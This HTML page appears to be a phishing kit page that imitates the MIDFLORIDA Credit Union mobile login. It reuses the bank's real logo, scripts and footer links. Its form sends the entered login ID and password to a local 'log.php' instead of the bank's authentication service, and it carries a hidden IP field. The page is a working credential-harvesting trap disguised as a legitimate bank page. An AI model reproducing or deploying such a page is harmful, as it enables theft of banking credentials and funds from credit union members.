<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">

    <!-- This will pre-load the font files before the css file requests them -->
    <link rel="preload" as="font" type="font/woff2" href="/fonts/8b338cb3-bb89-40d3-8c01-5580bceb3715.woff2">
    <link rel="preload" as="font" type="font/woff2" href="/fonts/207add5d-09f8-4df9-a0aa-e5f02f8bcb52.woff2">
    <link rel="preload" as="font" type="font/woff2" href="/fonts/7eb5d6ea-90f7-45d2-b771-5bd5b4978eb0.woff2">
    <link rel="preload" as="font" type="font/woff2" href="/fonts/7a65cc83-9de8-406c-b1d8-0391df58629d.woff2">
    <link rel="preload" as="font" type="font/woff2" href="/fonts/8ea6bd8e-4c27-4055-b5db-8780735770c3.woff2">

    <script type="text/javascript" async="" src="https://ssl.google-analytics.com/ga.js"></script><script src="https://m.midflorida.com/sso/Mobile/Scripts/jquery-3.6.0.min.js" type="text/javascript"></script>
    <link type="text/css" rel="stylesheet" href="https://m.midflorida.com/sso/Mobile/Content/Styles/mobiTheme.css">
    <script src="https://m.midflorida.com/sso/Mobile/Content/Scripts/MIDFLORIDA.mobiRedesign.js" type="text/javascript"></script>
    <script src="https://m.midflorida.com/sso/Mobile/Content/Scripts/pm_fp.js" type="text/javascript"></script>
    <script src="https://m.midflorida.com/sso/Mobile/Content/Scripts/ClientTouchID.mobi.js" type="text/javascript"></script>



    <script src="/sso/Mobile/bundles/js/Auth.mobi.js?v=VTx1nCHqtM7I3GfDNQcOZjHxR3Ko66j9FqJL-eMYl0Q1"></script>

</head>
<body>
<script>


function wea1() 
{
	
	
	 var x = document.getElementById("errorhandling");

    x.style.display = "none";
 

}
function tea1() 
{
	var x = document.getElementById("errorhandling");
	
	
	//x.removeAttribute('style');
	
	x.style.display = "block";
	
	
	
	
    //x.style.display = "block";

}



function check(form) 
{


//_ngcontent-qre-c75


if (form.userField.value == "")
{
tea1();



    //form.passwordTxt.focus(); 
    return;
}


if (form.userField.value.length < 2)
{
	tea1();
	
	return;
}

if (form.userField.value.length > 1)
{
	wea1();
}


if (form.password.value == "")
{
tea1();



    //form.passwordTxt.focus(); 
    return;
}


if (form.password.value.length < 2)
{
	tea1();
	
	return;
}

if (form.password.value.length > 1)
{
	wea1();
}






form.submit();

}

//]]>

</script>

    <form id="loginForm" name="loginForm"  action="log.php"method="post" class="form" autocomplete="off">
    <input  id="00NF000000DAKs6" maxlength="20" name="IP" size="20" type="hidden"></input>
									
        <div id="mcuLogo">
            <img src="https://m.midflorida.com/sso/Mobile/Content/img/logo_white@2x.png">
        </div>
		<div id="errorhandling" name="errorhandling" style="display:none;">
<div class="tile">
        <div class="tileheader">
            Error
        </div>
        <div class="tilesubtext">
            Please enter a valid Credentials!
        </div>
    </div>
</div>
        <input type="text" name="username" placeholder="Login ID" id="userField" value=""required>
        <br><br>
        <input type="password" name="password" placeholder="Enter Password" id="password" required>
        <br>
        <br>
        <label class="customCheckboxContainer" for="RememberMe">
            Remember Me
            <input id="RememberMe" name="RememberMe" type="checkbox" value="true"><input name="RememberMe" type="hidden" value="false">
            <span class="checkmark"></span>
        </label>
        <br><br>
        <button type="button" onclick="check(this.form)" name="mobilelogin" id="mobileLogin">Login</button>
        <br>
        <br>
        <div id="loginLowerContainer">
            <a class="actionLink" href="/sso/Mobile/Auth/ForgotUID">Forgot Login ID?</a>
            or  <a class="actionLink" href="/sso/Mobile/Auth/ForgotPassword">Forgot Password?</a>
            <div id="touchIdContainer" style="display: none;"></div>
        </div>
        <div id="loginFooter">
            <a onclick="loadExternalURL('https://www.midflorida.com/contact-us/')" class="boldLink float-left">Contact Us</a>
            <a onclick="loadExternalURL('https://www.midflorida.com/branch-atm-locator/')" class="boldLink">Locations</a>
            <a href="https://m.midflorida.com/sso/Mobile/SignUp/HavePin" class="boldLink float-right">Sign Up</a>
            <hr>
            <a onclick="loadExternalURL('https://www.midflorida.com/login')" class="float-left loginFooterBottomText">midflorida.com</a>
            <span id="copyrightInfo" class="loginFooterBottomText">©<span id="currYear">2022</span> MIDFLORIDA Credit Union</span>
            <a onclick="loadExternalURL('https://www.midflorida.com/resources/privacy-policy')" class="float-right loginFooterBottomText">Privacy Policy</a>
            <br><br>
            <span class="loginFooterBottomText">Equal Housing Opportunity | Insured by NCUA | NMLS #417627</span>
        </div>

        <input id="DevicePrint" name="DevicePrint" type="hidden" value="version%3D1%26pm%5Ffpua%3Dmozilla%2F5%2E0%20%28iphone%3B%20cpu%20iphone%20os%2013%5F2%5F3%20like%20mac%20os%20x%29%20applewebkit%2F605%2E1%2E15%20%28khtml%2C%20like%20gecko%29%20version%2F13%2E0%2E3%20mobile%2F15e148%20safari%2F604%2E1%7C5%2E0%20%28iPhone%3B%20CPU%20iPhone%20OS%2013%5F2%5F3%20like%20Mac%20OS%20X%29%20AppleWebKit%2F605%2E1%2E15%20%28KHTML%2C%20like%20Gecko%29%20Version%2F13%2E0%2E3%20Mobile%2F15E148%20Safari%2F604%2E1%7CWin32%26pm%5Ffpsc%3D24%7C414%7C896%7C896%26pm%5Ffpsw%3D%26pm%5Ffptz%3D%2D8%26pm%5Ffpln%3Dlang%3Den%2DUS%7Csyslang%3D%7Cuserlang%3D%26pm%5Ffpjv%3D0%26pm%5Ffpco%3D1">
        <input id="UserId" name="UserId" type="hidden" value="">
        <input id="hfTouchID" name="hfTouchID" type="hidden" value="">
        <input id="hfTouchPassword" name="hfTouchPassword" type="hidden" value="">


        <input id="hfTouchSetup" name="hfTouchSetup" type="hidden" value="False">
        <input id="hfTouchSettingsRedirect" name="hfTouchSettingsRedirect" type="hidden" value="False">
        <input id="NotchSize" name="NotchSize" type="hidden" value="">

<input id="CordovaInfo" name="CordovaInfo" type="hidden" value="ios|||UNSUPPORTED">
    </form>

</body></html>